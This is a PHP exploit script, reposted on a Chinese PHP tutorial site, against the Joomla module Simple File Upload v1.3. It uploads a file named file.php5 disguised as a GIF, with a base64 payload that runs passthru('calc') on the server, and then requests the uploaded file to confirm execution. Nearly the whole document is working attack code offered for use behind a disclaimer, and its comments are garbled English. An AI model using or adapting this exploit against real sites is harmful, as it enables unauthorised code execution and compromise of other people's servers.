来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] ?PHP/* -------------------------------------------------------------------------------- 标题: Simple File Upload v1.3 (module for joomla) Remote Code Execution Exploit -------------......
|
<?PHP
/*
--------------------------------------------------------------------------------
标题: Simple File Upload v1.3 (module for joomla) Remote Code Execution Exploit
-------------------------------------------------------------------------------- 作者: gmda www.2cto.com gmda[at]email[dot]it 网站: http://www.gmda.altervista.org/ 软件地址: http://wasen.net/downloads/mod_simpleFileUpload.1.3.zip 受影响版本: 1.3 测试平台: winxp php version 5.3.2 Apache 2.0
*the setup of the module is no captcha other setups are the default*
+-------------------------------------------------------------------------+
| 仅供技术交流,使用者风险自担 |
+-------------------------------------------------------------------------+
The vulnerability is closed to transmit malformed packets to the server that he still plays and saves in his belly.
This thing can be a bad intent to send commands to the server running clearly causing safety problems ........
The script has peroblemi upload quality control .....
*/
$host="127.0.0.1";
$port=80;
$shell="R0lGOC8qLyo8P3BocCBwYXNzdGhydSgnY2FsYycpPz4vKg==";
$ContentType="image/gif";
$post="POST http://www.2cto.com /Joomla_1.5.23_ita-Stable_test_expl/index.php";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$filename="file.php5";
if(!$fp) die($errstr.$errno); else {
$data="-----------------------------41184676334\r\n";
$data.="Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n";
$data.="\r\n";
$data.="100000\r\n-----------------------------41184676334\r\n";
$data.="Content-Disposition: form-data;name=\"sfuFormFields44\"\r\n";
$data.="\r\n\r\n";
$data.="-----------------------------41184676334\r\n";
$data.="Content-Disposition:form-data; name=\"uploadedfile44[]\"; filename=\"file.php5\"\r\nContent-Type: image/gif\r\n\r\n";
$data.=base64_decode($shell)."\r\n";
$data.="-----------------------------41184676334--\r\n";
$packet="$post HTTP/1.1\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
fwrite($fp, $packet);
fclose($fp);
}
$h = @fopen("http://".$host."/Joomla_1.5.23_ita-Stable_test_expl/images/file.php5", "r");
if ($h) {
while (($buf = fgets($h, 4096)) !== false) {
echo $buf;
echo("exploit was successful");
}
fclose($h);
}else{
echo("Error: exploit fail");
}
?> |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
